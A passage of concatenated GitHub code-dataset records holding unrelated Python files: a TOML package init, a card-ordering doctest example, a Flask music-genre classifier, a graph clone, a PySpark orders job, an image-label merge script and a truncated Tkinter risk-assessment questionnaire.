code=end\n\n","repo_name":"Interesting6/FuckLeetCode","sub_path":"14.最长公共前缀.py","file_name":"14.最长公共前缀.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40070388431","text":"\"\"\"Python module which parses and emits TOML.\n\nReleased under the MIT license.\n\"\"\"\n\nfrom . import encoder\nfrom . import decoder\n\n__version__ = \"0.10.1\"\n_spec_ = \"0.5.0\"\n\nload = decoder.load\nloads = decoder.loads\nTomlDecoder = decoder.TomlDecoder\nTomlDecodeError = decoder.TomlDecodeError\nTomlPreserveCommentDecoder = decoder.TomlPreserveCommentDecoder\n\ndump = encoder.dump\ndumps = encoder.dumps\nTomlEncoder = encoder.TomlEncoder\nTomlArraySeparatorEncoder = encoder.TomlArraySeparatorEncoder\nTomlPreserveInlineDictEncoder = encoder.TomlPreserveInlineDictEncoder\nTomlNumpyEncoder = encoder.TomlNumpyEncoder\nTomlPreserveCommentEncoder = encoder.TomlPreserveCommentEncoder\nTomlPathlibEncoder = encoder.TomlPathlibEncoder\n\nfrom collections import OrderedDict\n\nclass TomlOrderedDecoder(TomlDecoder):\n\n def __init__(self):\n super(self.__class__, self).__init__(_dict=OrderedDict)\n\n\nclass TomlOrderedEncoder(TomlEncoder):\n\n def __init__(self):\n super(self.__class__, self).__init__(_dict=OrderedDict)\n\n#print('TOML', __version__, flush=True)","repo_name":"Ghostik2005/Sklad71","sub_path":"sources/backend/toml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37038567358","text":"#!/usr/bin/env python3\r\n\"\"\"Python. Programowanie funkcyjne\r\n\r\nRozdział 10, zbiór przykładów 2\r\n\"\"\"\r\n# pylint: disable=wrong-import-position\r\n\r\nfrom numbers import Number\r\nfrom functools import total_ordering\r\nfrom typing import NamedTuple\r\n\r\nclass Card1(NamedTuple):\r\n rank: int\r\n suit: str\r\n\r\ntest_card1 = \"\"\"\r\n>>> c2s= Card1(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\nCard1(rank=2, suit='♠')\r\n>>> len(c2s)\r\n2\r\n\r\nJest to * nieprawidłowe * zachowanie w grach, w których \r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card1(2, '\\u2665')\r\n>>> c2h == c2s\r\nFalse\r\n>>> \"{0}== {1}: {2}\".format( c2s, c2h, c2h == c2s )\r\n\"Card1(rank=2, suit='♠')== Card1(rank=2, suit='♥'): False\"\r\n\"\"\"\r\n\r\nfrom typing import Union, Any\r\nCardInt = Union['Card', int]\r\n\r\n@total_ordering\r\nclass Card(tuple):\r\n \"\"\"Obiekt niemutowalny; porównania tylko do rankingu.\r\n \r\n Stara szkoła. 
\r\n\r\n Suits= '\\u2660', '\\u2665', '\\u2666', '\\u2663'\r\n \"\"\"\r\n __slots__ = ()\r\n def __new__(cls, rank, suit):\r\n obj = super().__new__(Card, (suit, rank))\r\n return obj\r\n def __repr__(self) -> str:\r\n return \"{0.rank}{0.suit}\".format(self)\r\n @property\r\n def rank(self) -> int:\r\n return self[1]\r\n @property\r\n def suit(self) -> str:\r\n return self[0]\r\n def __eq__(self, other: Any) -> bool:\r\n if isinstance(other, Card):\r\n return self.rank == other.rank\r\n elif isinstance(other, int):\r\n return self.rank == other\r\n return NotImplemented\r\n def __lt__(self, other: Any) -> bool:\r\n if isinstance(other, Card):\r\n return self.rank < other.rank\r\n elif isinstance(other, int):\r\n return self.rank < other\r\n return NotImplemented\r\n\r\ntest_eq = \"\"\"\r\n>>> c2s= Card(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\n2\\u2660\r\n>>> len(c2s)\r\n2\r\n\r\nTo jest prawidłowe zachowanie w grach, w których\r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card(2, '\\u2665')\r\n>>> c2h == c2s\r\nTrue\r\n>>> \"{0}== {1}: {2}\".format(c2s, c2h, c2h == c2s)\r\n'2\\u2660== 2\\u2665: True'\r\n>>> c2h == 2\r\nTrue\r\n>>> 2 == c2h\r\nTrue\r\n\"\"\"\r\n\r\ntest_order = \"\"\"\r\n>>> c2s= Card(2, '\\u2660')\r\n>>> c3h= Card(3, '\\u2665')\r\n>>> c4c= Card(4, '\\u2663')\r\n>>> c2s <= c3h < c4c\r\nTrue\r\n>>> c3h >= c3h\r\nTrue\r\n>>> c3h > c2s\r\nTrue\r\n>>> c4c != c2s\r\nTrue\r\n\"\"\"\r\n\r\nextra_comparisons = \"\"\"\r\nTe nie działają, logika nie pasuje do total_ordering.\r\n\r\n>>> c4c= Card(4, '\\u2663')\r\n>>> try:\r\n... print(\"c4c > 3\", c4c > 3)\r\n... except TypeError as e:\r\n... print(e)\r\n'>' not supported between instances of 'Card' and 'int'\r\n>>> try:\r\n... print(\"3 < c4c\", 3 < c4c)\r\n... except TypeError as e:\r\n... print(e)\r\n'<' not supported between instances of 'int' and 'Card'\r\n\"\"\"\r\n\r\n@total_ordering\r\nclass Card2(NamedTuple):\r\n rank: int\r\n suit: str\r\n def __str__(self) -> str:\r\n return \"{0.rank}{0.suit}\".format(self)\r\n def __eq__(self, other: Any) -> bool:\r\n if isinstance(other, Card2):\r\n return self.rank == other.rank\r\n elif isinstance(other, int):\r\n return self.rank == other\r\n return NotImplemented\r\n def __lt__(self, other: Any) -> bool:\r\n if isinstance(other, Card2):\r\n return self.rank < other.rank\r\n elif isinstance(other, int):\r\n return self.rank < other\r\n return NotImplemented\r\n \r\ntest_eq_2 = \"\"\"\r\n>>> c2s = Card2(2, '\\u2660')\r\n>>> c2s.rank\r\n2\r\n>>> c2s.suit\r\n'\\u2660'\r\n>>> c2s\r\nCard2(rank=2, suit='\\u2660')\r\n>>> len(c2s)\r\n2\r\n\r\nTo jest prawidłowe zachowanie w grach, w których\r\nranga jest jedynym istotnym atrybutem\r\n\r\n>>> c2h= Card2(2, '\\u2665')\r\n>>> c2h == c2s\r\nTrue\r\n>>> \"{0} == {1}: {2}\".format(c2s, c2h, c2h == c2s)\r\n'2\\u2660 == 2\\u2665: True'\r\n>>> c2h == 2\r\nTrue\r\n>>> 2 == c2h\r\nTrue\r\n\"\"\"\r\n\r\ntest_order_2 = \"\"\"\r\n>>> c2s= Card2(2, '\\u2660')\r\n>>> c3h= Card2(3, '\\u2665')\r\n>>> c4c= Card2(4, '\\u2663')\r\n>>> c2s <= c3h < c4c\r\nTrue\r\n>>> c3h >= c3h\r\nTrue\r\n>>> c3h > c2s\r\nTrue\r\n>>> c4c != c2s\r\nTrue\r\n\"\"\"\r\n\r\nextra_comparisons_2 = \"\"\"\r\nTe nie działają, logika nie pasuje do total_ordering.\r\n\r\n>>> c4c= Card2(4, '\\u2663')\r\n>>> try:\r\n... print(\"c4c > 3\", c4c > 3)\r\n... except TypeError as e:\r\n... print(e)\r\n'>' not supported between instances of 'Card2' and 'int'\r\n>>> try:\r\n... print(\"3 < c4c\", 3 < c4c)\r\n... except TypeError as e:\r\n... 
print(e)\r\n'<' not supported between instances of 'int' and 'Card2'\r\n\"\"\"\r\n\r\n__test__ = {\r\n \"test_card1\": test_card1,\r\n \"test_eq\": test_eq,\r\n \"test_order\": test_order,\r\n \"extra_comparisons\": extra_comparisons,\r\n \"test_eq_2\": test_eq_2,\r\n \"test_order_2\": test_order_2,\r\n \"extra_comparisons_2\": extra_comparisons_2,\r\n }\r\n\r\ndef test():\r\n import doctest\r\n doctest.testmod(verbose=1)\r\n\r\nif __name__ == \"__main__\":\r\n test()\r\n","repo_name":"adrian88szymanski/Python_project","sub_path":"Functional Python Programming/Chapter10/ch10_ex2.py","file_name":"ch10_ex2.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43549456897","text":"from operator import add\nfrom math import sin, cos, radians\n\nfrom .convex_stage import convex_hull_inner\n\n\nclass StarStage:\n \"\"\"\n スター型のステージを作るための自作ライブラリ\n \"\"\"\n def __init__(self, width, height) -> None:\n self.width = width\n self.height = height\n self.__stage = [[0 for j in range(self.height)] for i in range(self.width)]\n\n def select(self, x: int, y: int) -> None:\n \"\"\"\n turn to self.__stage[x][y] == 1\n \"\"\"\n self.__stage[x][y] = 1\n\n def draw_circle(self, x: int, y: int, radius: int) -> None:\n \"\"\"\n (x, y) を中心とした半径 radius の円の領域内の値を1にセットする\n \"\"\"\n for i in range(self.width):\n for j in range(self.height):\n if (i - x)**2 + (j - y)**2 <= radius**2:\n self.select(i, j)\n\n def draw_rect(self, x: int, y: int, offset: float, width: float, height: float, degree: float):\n \"\"\"\n (x, y)を起点とし、そこから(r, θ) = (offset, degree)離れた場所を\n 最近接辺の中心とする幅width, 高さheightの長方形を作る\n \"\"\"\n\n rad = radians(degree)\n midpoint = (x + offset * cos(rad), y + offset * sin(rad))\n vertex = [\n tuple(map(add, midpoint, (width * sin(rad) / 2, -width * cos(rad) / 2))),\n tuple(map(add, midpoint, (-width * sin(rad) / 2, width * cos(rad) / 2))),\n tuple(map(add, midpoint, (-width * sin(rad) / 2 + height * cos(rad), width * cos(rad) / 2 + height * sin(rad)))),\n tuple(map(add, midpoint, (width * sin(rad) / 2 + height * cos(rad), -width * cos(rad) / 2 + height * sin(rad)))),\n ]\n # 整数化とタプル化\n vertex = tuple([tuple(map(round, v)) for v in vertex])\n # vertexを反時計回りに並べ替える\n inner_point = convex_hull_inner(vertex)\n for i, j in inner_point:\n self.select(i, j)\n\n def __str__(self):\n print(\"cells are indexed by [x][y]\")\n return \"\\n\".join(map(str, self.__stage))\n\n @property\n def stage_region(self):\n \"\"\"\n エージェント・誘因力の存在可能部分のみ1にマスクされた\n 二次元配列を返す\n\n return: self.__stage (list[int][int])\n \"\"\"\n return self.__stage\n","repo_name":"PastaSoba/Wu-s_physarum","sub_path":"wu_physarum/lib/star_stage.py","file_name":"star_stage.py","file_ext":"py","file_size_in_byte":2384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1177036795","text":"from flask import Flask, render_template\nimport pickle\nimport numpy as np\nfrom keras.models import load_model\nimport h5py\nimport sys\nimport librosa\nimport random\nimport math\napp = Flask(__name__)\n\n\nprd_model = load_model('models/RNN_model.hdf5')\nprd_model2 = load_model('models/RNN_bolly_model1.hdf5')\nprint(\"MODEL INSTANCE HERE\", file=sys.stderr)\nprint(prd_model, file=sys.stderr)\n\ngenres = np.array(['blues', 'classical', 'country', 'disco', 'hiphop', 'jazz',\n 'metal', 'pop', 'reggae', 'rock'])\ngenres2 = np.array(['bollypop', 'carnatic', 'ghazal', 'semiclassical', 'sufi'])\n\n\ndef predict(model, 
X, genres):\n    print(\"INSIDE PREDICTION\", file=sys.stderr)\n    print(X, file=sys.stderr)\n    X = X[np.newaxis, ...]\n    prediction = model.predict(X)\n    predicted_index = np.argmax(prediction, axis=1)\n    print(\"Outcome Index: {}\".format(predicted_index))\n    print(\"Outcome genre: {}\".format(genres[predicted_index]))\n    return genres[predicted_index]\n\n\ndef save(genres, prd_model, path, n_mfcc=13, n_fft=2048, hop_length=512, num_segments=5):\n\n    sample_rate = 22050\n    duration = 30\n    samples_per_track = sample_rate * duration\n    data = {\n\n        \"mfcc\": [],\n\n    }\n\n    num_samples_per_segment = int(samples_per_track/num_segments)\n    expected_mfccv_per_segments = math.ceil(num_samples_per_segment/hop_length)\n    signal, sr = librosa.load(path, sr=sample_rate)\n\n    for s in range(num_segments):\n\n        start = num_samples_per_segment * s\n        finish = start + num_samples_per_segment\n        mfcc = librosa.feature.mfcc(\n            signal[start:finish], sr=sr, n_fft=n_fft, n_mfcc=n_mfcc, hop_length=hop_length)\n        mfcc = mfcc.T\n        if len(mfcc) == expected_mfccv_per_segments:\n            data[\"mfcc\"].append(mfcc.tolist())\n            print(\"{}, segment:{}\".format(path, s))\n\n    genre = predict(prd_model, np.array(data[\"mfcc\"])[1], genres)\n\n    return genre\n\n\n@app.route(\"/\")\ndef home():\n\n    musicmap = [\"clsong.wav\",\n                \"cosong.wav\", \"hsong.wav\", \"msong.wav\", \"song1.wav\", \"song2.wav\", \"song3.wav\"]\n    musicmap2 = [\"bsong.wav\",\n                 \"susong.wav\", \"semsong.wav\", \"msong.wav\", \"ghsong.wav\", \"carsong.wav\"]\n\n    print(musicmap)\n    pictureList = [\"https://i1.wp.com/cornellsun.com/wp-content/uploads/2019/09/a3825990458_10.jpg?w=1200\", \"https://substreammagazine.com/wp-content/uploads/2020/07/Valley-2020-scaled.jpg\", \"https://i.pinimg.com/originals/42/c4/1e/42c41e228d7bc5cf4496f787fdc2b23b.jpg\",\n                   \"https://images-na.ssl-images-amazon.com/images/I/513VUhBNJzL.jpg\", \"https://images-na.ssl-images-amazon.com/images/I/513VUhBNJzL.jpg\", \"https://www.gratefulweb.com/sites/default/files/images/articles/DSC_5675.jpg\", \"https://66.media.tumblr.com/18f3a10f6cd8cb849138f77d8a3f09a1/tumblr_inline_ptzcmmfz8B1s9on4d_540.jpg\"]\n\n    pictureList2 = [\"https://rollingstoneindia.com/wp-content/uploads/2018/05/1-RSCover-MAY-18-lower-res-480x628.jpg\",\n                    \"https://static.toiimg.com/thumb/msid-63414571,width-800,height-600,resizemode-75,imgsize-25766/63414571.jpg\",\n                    \"https://upload.wikimedia.org/wikipedia/commons/a/a0/Prateek_Kuhad_New.jpg\",\n                    \"https://englishtribuneimages.blob.core.windows.net/gallary-content/2020/7/2020_7$largeimg_741540610.jpg\",\n                    \"https://static.toiimg.com/photo/78868526/78868526.jpg?v=3\",\n                    \"https://rollingstoneindia.com/wp-content/uploads/2020/09/Armaan-3-960x1243.jpg\"]\n    return render_template(\"index.html\", musicmaps=zip(musicmap, pictureList), musicmaps2=zip(musicmap2, pictureList2))\n\n\n@app.route(\"/<name>\")\ndef mus(name):\n    path = f\"static/music/{name}\"\n    genre = save(genres, prd_model, path, num_segments=5)\n    print(\"The Value Of Genre Is: {}\".format(genre), file=sys.stderr)\n    return render_template(\"home.html\", music=name, genre=genre[0].title())\n\n\n@app.route(\"/hindi/<name>\")\ndef hmus(name):\n    path = f\"static/music/{name}\"\n    genre = save(genres2, prd_model2, path, num_segments=5)\n    print(\"The Value NAME IS: {}\".format(name), file=sys.stderr)\n    return render_template(\"home2.html\", music=name, genre=genre[0].title())\n\n\nif __name__ == \"__main__\":\n    
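# ---------------------------------------------------------------
# Aside: a minimal sketch (not part of the app above) of the frame-count
# check in save(): a segment is kept only when its MFCC frame count equals
# ceil(samples_per_segment / hop_length). librosa.feature.mfcc returns an
# array of shape (n_mfcc, frames), which the code transposes so each row
# is one frame's 13-coefficient vector.
#
#     import math
#     sample_rate, duration, num_segments, hop_length = 22050, 30, 5, 512
#     samples_per_segment = sample_rate * duration // num_segments
#     print(math.ceil(samples_per_segment / hop_length))  # 259 frames expected
# ---------------------------------------------------------------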
app.run(debug=True)\n","repo_name":"hasnain40247/MusicGenreModels","sub_path":"flaskApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2574263231","text":"from ursina import *\n\n\nclass Plant(Entity):\n def __init__(self, position=Vec3(0, 0, 0), scale=(1, 1, 1), model='cube', texture='white_cube', rotation=(0,0,0), ptype='tree'): # possible types are:\n self.ptype=ptype\n super().__init__( # tree, mushroom, purple_flower, \n model=model, # strawberry_flower, toxic_flower\n texture=texture,\n position=position,\n scale=scale,\n rotation=rotation,\n collider='mesh',\n )","repo_name":"Brusnarq/Hacktues-8.v2","sub_path":"plant.py","file_name":"plant.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32518315479","text":"#!/usr/bin/env python2.7\n\n\n'''\nClone an undirected graph. Each node in the graph contains a label and a list of its neighbors.\n\n\nOJ's undirected graph serialization:\nNodes are labeled uniquely.\n\nWe use # as a separator for each node, and , as a separator for node label and each neighbor of the node.\nAs an example, consider the serialized graph {0,1,2#1,2#2,2}.\n\nThe graph has a total of three nodes, and therefore contains three parts as separated by #.\n\nFirst node is labeled as 0. Connect node 0 to both nodes 1 and 2.\nSecond node is labeled as 1. Connect node 1 to node 2.\nThird node is labeled as 2. Connect node 2 to node 2 (itself), thus forming a self-cycle.\nVisually, the graph looks like the following:\n\n 1\n / \\\n / \\\n 0 --- 2\n / \\\n \\_/\n'''\n\n# Definition for a undirected graph node\n# class UndirectedGraphNode(object):\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nimport src.data_structure\n\nclass Solution(object):\n def clone_graph(self, node):\n if node is None:\n return None\n q = [node]\n d = dict()\n ret = src.data_structure.UndirectedGraphNode(node.label)\n d[node] = ret\n while q:\n tmp = q.pop(0)\n neighbor_list = tmp.neighbors\n for item in neighbor_list:\n if item in d:\n d[tmp].neighbors.append(d[item])\n else:\n new_node = src.data_structure.UndirectedGraphNode(item.label)\n d[item] = new_node\n d[tmp].neighbors.append(d[item])\n q.append(item)\n return ret\n","repo_name":"fifa007/Leetcode","sub_path":"src/clone_graph.py","file_name":"clone_graph.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32189710457","text":"# Import Utilities\nfrom Utilities import get_body_statistics, get_subject_statistics\nimport flask\nfrom flask_cors import CORS\n\napp = flask.Flask(__name__)\n# app.config[\"DEBUG\"] = True\nCORS(app)\n\n\n@app.route(\"/\")\ndef hello_world():\n return \"Hello world!\"\n\n# Submit an email Body and Subject and it'll analyze\n@app.route('/email_analysis', methods=['POST'])\ndef email_analyzer():\n request_data = flask.request.get_json()\n if \"body\" not in request_data.keys():\n message = {\n 'status': 400,\n 'message': \"You must include a 'body' object in the request\"\n }\n resp = flask.jsonify(message)\n resp.status_code = 400\n return resp\n\n if \"subject\" not in request_data.keys():\n message = {\n 'status': 400,\n 'message': \"You must include a 'subject' object in the request\"\n }\n resp = flask.jsonify(message)\n resp.status_code = 400\n return 
resp\n\n if request_data[\"body\"] == \"\":\n body_statistics = {\n \"empty\": True\n }\n else:\n body_statistics = get_body_statistics(request_data[\"body\"])\n # If subject doesn't exist\n if request_data[\"subject\"] == \"\":\n subject_statistics = {\n \"empty\": True\n }\n else:\n subject_statistics = get_subject_statistics(request_data[\"subject\"])\n\n email_statistics = {\n \"body_statistics\": body_statistics,\n \"subject_statistics\": subject_statistics\n }\n\n message = {\n 'status': 200,\n 'message': 'OK',\n 'email_statistics': email_statistics\n }\n\n resp = flask.jsonify(message)\n resp.status_code = 200\n return resp\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"rreynolds46/emailanalyzer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28803764505","text":"# pyspark --master yarn --conf spark.ui.port=12990 --packages com.databricks:spark-avro_2.10:2.0.1\n\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SQLContext\n\nconf = SparkConf().setAppName('problem1').setMaster('yarn-client')\n\nsc = SparkContext(conf=conf)\n\nsqlContext = SQLContext(sc)\n\nsqlContext.setConf('spark.sql.avro.compression.codec','snappy')\n\nordersDF = sqlContext.read.load('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/orders', 'com.databricks.spark.avro')\n\norderItemsDF = sqlContext.read.load('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/order-items','com.databricks.spark.avro')\n\nordersDF.registerTempTable('orders')\n\norderItemsDF.registerTempTable('order_items')\n\nresultDF = sqlContext.sql('\\\n select to_date(from_unixtime(o.order_date/1000)) as order_date, o.order_status, sum(oi.order_item_subtotal) as total_amount, count(distinct o.order_id) as total_orders \\\n from orders o \\\n join order_items oi \\\n on o.order_id == oi.order_item_order_id \\\n group by o.order_date, o.order_status \\\n order by o.order_date desc, o.order_status, total_amount desc,total_orders')\n\nsqlContext.setConf('spark.sql.parquet.compression.codec','gzip')\n\nresultDF.write.mode('overwrite').save('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-gzip', \"parquet\")\n\nsqlContext.setConf('spark.sql.parquet.compression.codec','snappy')\n\nresultDF.write.mode('overwrite').save('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-snappy','parquet')\n\nsqlContext.setConf('spark.sql.csv.compression.codec','uncompressed')\n\nresultDF.map(lambda line: str(line[0]) + \",\" + line[1] + \",\" + str(line[2]) +\",\" + str(line[3])).coalesce(1).saveAsTextFile('/user/riddhiparkhiya/anilagrawal/cloudera/problem1/result4a-csv')","repo_name":"marwaadihu/spark-practice","sub_path":"arun-teaches-u-tech-blogspot-com-problem-1/problem-1.py","file_name":"problem-1.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23700250771","text":"import os\r\nimport shutil\r\n\r\n\r\ndef get_new_filepath(out_dir, label):\r\n filepath = f\"{out_dir}/{label}.jpg\"\r\n if os.path.exists(filepath):\r\n i = 1\r\n _, suffix = os.path.splitext(filepath)\r\n while True:\r\n filepath = f\"{out_dir}/{label}_{i}{suffix}\"\r\n if not os.path.exists(filepath):\r\n break\r\n i = i + 1\r\n return filepath\r\n\r\n\r\nif __name__ == \"__main__\":\r\n label_path = [\"evalImageSet_old/eval.txt\", \"./image_1/label.txt\", \"./image_2/label.txt\", 
\"./image_3/label.txt\"]\r\n out_image_dir = \"evalImageSet\"\r\n out_label_path = \"eval.txt\"\r\n\r\n if not os.path.exists(out_image_dir):\r\n os.mkdir(out_image_dir)\r\n\r\n # read\r\n label_txt = []\r\n for i, path in enumerate(label_path):\r\n with open(path, mode='r', encoding='utf-8') as f:\r\n label_txt.append(f.readlines())\r\n\r\n # merge\r\n brackets_cnt, too_many_equal_cnt = 0, 0\r\n filepath, label = [], []\r\n for i in range(max([len(txt) for txt in label_txt])):\r\n for j in range(len(label_txt)):\r\n if i >= len(label_txt[j]):\r\n continue\r\n txt: list[str] = label_txt[j]\r\n p, l = txt[i].strip().split('\\t') \r\n if \"(\" in l or \")\" in l:\r\n brackets_cnt += 1\r\n continue\r\n if l.count('=') >= 2:\r\n too_many_equal_cnt += 1\r\n continue\r\n filepath.append(p)\r\n label.append(l)\r\n\r\n # write\r\n print(f\"括号数量: {brackets_cnt}, 两个以上等号数量: {too_many_equal_cnt}\")\r\n print(f\"file number = {len(filepath)}\")\r\n i = 1\r\n for p, l in zip(filepath, label):\r\n try:\r\n old_p = p\r\n new_p = get_new_filepath(out_image_dir, l)\r\n shutil.copyfile(old_p, new_p)\r\n # print(f\"{i}: {p} -> {new_p}\")\r\n with open(out_label_path, mode=\"a+\", encoding=\"utf-8\") as f:\r\n f.write(f\"{new_p}\\t{l}\\n\")\r\n if not os.path.exists(new_p):\r\n print(f\"{i}: error in {new_p}\")\r\n i += 1\r\n except Exception as e:\r\n with open('log.txt', mode='a+', encoding='utf-8') as f:\r\n f.write(f\"{p}: {e}\\n\")\r\n print('Reason:', e)\r\n continue\r\n\r\n\r\n","repo_name":"fioepq9/simple-expression-corrector","sub_path":"server/trainer/data/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36251656190","text":"from tkinter import *\r\nwindow=Tk()\r\nwindow.title('Risk Assessment Tool')\r\nwindow.iconbitmap('C:/gui/RAexamplelogo.ico')\r\nwindow['bg']='light blue'\r\ntitle=Label(window,text='RA Tool',font=('Arial',40), bg='light blue')\r\ntitle.place(x=600, y=50)\r\nlabelComp=Label(window,text='Company Name =',font=('Arial',30), bg='light blue')\r\nlabelComp.place(x=150,y=250)\r\nnameEntered=Entry(window,font=('Arial',30))\r\nnameEntered.place(x=500,y=250)\r\nworm=0\r\nransomware=0\r\nsqli=0\r\ntrojan=0\r\n\r\ndef questions1():\r\n compName=nameEntered.get()\r\n quesNumb1=Label(window,text='Question 1:',font=('Arial',40), bg='light blue')\r\n quesNumb1.place(x=570, y=20)\r\n question1=Label(window,text='How many users do you have?',font=('Arial',30), bg='light blue')\r\n question1.place(x=499,y=100)\r\n\r\n def worm2():\r\n global worm\r\n worm +=1\r\n labelw2=Label(window)\r\n labelw2.pack()\r\n labelw2.after(10,questions2)\r\n\r\n def ransomware2():\r\n global ransomware\r\n ransomware +=1\r\n labelr2=Label(window)\r\n labelr2.pack()\r\n labelr2.after(10,questions2)\r\n\r\n def questions2():\r\n\r\n quesNumb2=Label(window,text='Question 2',font=('Arial',40), bg='light blue')\r\n quesNumb2.place(x=570, y=20)\r\n question2=Label(window,text='How often do you perfom scans',font=('Arial',30), bg='light blue')\r\n question2.place(x=499,y=100)\r\n\r\n def trojan3():\r\n\r\n global trojan\r\n trojan +=1\r\n labelt3=Label(window)\r\n labelt3.pack()\r\n labelt3.after(10,questions3)\r\n\r\n def ransomware3():\r\n global ransomware\r\n ransomware +=1\r\n labelr3 = Label(window)\r\n labelr3.pack()\r\n labelr3.after(10,questions3)\r\n\r\n def questions3():\r\n \r\n quesNumb3=Label(window,text='Question 3',font=('Arial',40), bg='light blue')\r\n 
quesNumb3.place(x=570, y=20)\r\n question3=Label(window,text='Do you backup regularly?',font=('Arial',30), bg='light blue')\r\n question3.place(x=499,y=100)\r\n\r\n def worm4():\r\n\r\n global worm\r\n worm +=1\r\n labelw4=Label(window)\r\n labelw4.pack()\r\n labelw4.after(10,questions4)\r\n\r\n def questions4():\r\n\r\n quesNumb4=Label(window,text='Question 4',font=('Arial',40), bg='light blue')\r\n quesNumb4.place(x=570, y=20)\r\n question4=Label(window,text='In what range is your income',font=('Arial',30), bg='light blue')\r\n question4.place(x=499,y=100)\r\n\r\n def ransomware5():\r\n\r\n global ransomware\r\n ransomware +=1\r\n labelr5=Label(window)\r\n labelr5.pack()\r\n labelr5.after(10,questions5)\r\n\r\n def sqli5():\r\n\r\n global sqli\r\n sqli +=1\r\n labels5=Label(window)\r\n labels5.pack()\r\n labels5.after(10,questions5)\r\n\r\n def questions5():\r\n\r\n quesNumb5=Label(window,text='Question 5',font=('Arial',40), bg='light blue')\r\n quesNumb5.place(x=570, y=20)\r\n question5=Label(window,text='Do you implement website download restrictions?',font=('Arial',30), bg='light blue')\r\n question5.place(x=290,y=100)\r\n\r\n def ransomware6():\r\n\r\n global ransomware\r\n ransomware +=1\r\n labelr6=Label(window)\r\n labelr6.pack()\r\n labelr6.after(10,questions6)\r\n\r\n def sqli6():\r\n\r\n global sqli\r\n sqli +=1\r\n labels6=Label(window)\r\n labels6.pack()\r\n labels6.after(10,questions6)\r\n\r\n def questions6():\r\n\r\n quesNumb6=Label(window,text='Question 6',font=('Arial',40), bg='light blue')\r\n quesNumb6.place(x=570, y=20)\r\n question6=Label(window,text='Do you utilise anti-virus?',font=('Arial',30), bg='light blue')\r\n question6.place(x=420,y=100)\r\n\r\n def worm7():\r\n\r\n global worm\r\n worm +=1\r\n labelw7=Label(window)\r\n labelw7.pack()\r\n labelw7.after(10,questions7)\r\n\r\n def sqli7():\r\n\r\n global sqli\r\n sqli +=1\r\n labels7=Label(window)\r\n labels7.pack()\r\n labels7.after(10,questions7)\r\n\r\n def questions7():\r\n\r\n quesNumb7=Label(window,text='Question 7',font=('Arial',40), bg='light blue')\r\n quesNumb7.place(x=570, y=20)\r\n question7=Label(window,text='How consistently do you update hardware?',font=('Arial',30), bg='light blue')\r\n question7.place(x=400,y=100)\r\n\r\n def trojan8():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt8=Label(window)\r\n labelt8.pack()\r\n labelt8.after(10,questions8)\r\n \r\n def sqli8():\r\n \r\n global worm\r\n worm +=1\r\n labelw8=Label(window)\r\n labelw8.pack()\r\n labelw8.after(10,questions8)\r\n \r\n def questions8():\r\n\r\n quesNumb8=Label(window,text='Question 8',font=('Arial',40), bg='light blue')\r\n quesNumb8.place(x=570, y=20)\r\n question8=Label(window,text='Do you implement email download restrictions?',font=('Arial',30), bg='light blue')\r\n question8.place(x=400,y=100)\r\n\r\n\r\n def worm9():\r\n \r\n global worm\r\n worm +=1\r\n labelw9=Label(window)\r\n labelw9.pack()\r\n labelw9.after(10,questions9)\r\n \r\n def questions9():\r\n\r\n quesNumb9=Label(window,text='Question 9',font=('Arial',40), bg='light blue')\r\n quesNumb9.place(x=570, y=20)\r\n question9=Label(window,text='Do you recieve frequent scam emails?',font=('Arial',30), bg='light blue')\r\n question9.place(x=450,y=100)\r\n\r\n def trojan10():\r\n \r\n global trojan\r\n trojan +=1\r\n labelt10=Label(window)\r\n labelt10.pack()\r\n labelt10.after(10,questions10)\r\n \r\n def questions10():\r\n\r\n quesNumb10=Label(window,text='Question 10',font=('Arial',40), bg='light blue')\r\n quesNumb10.place(x=570, y=20)\r\n 
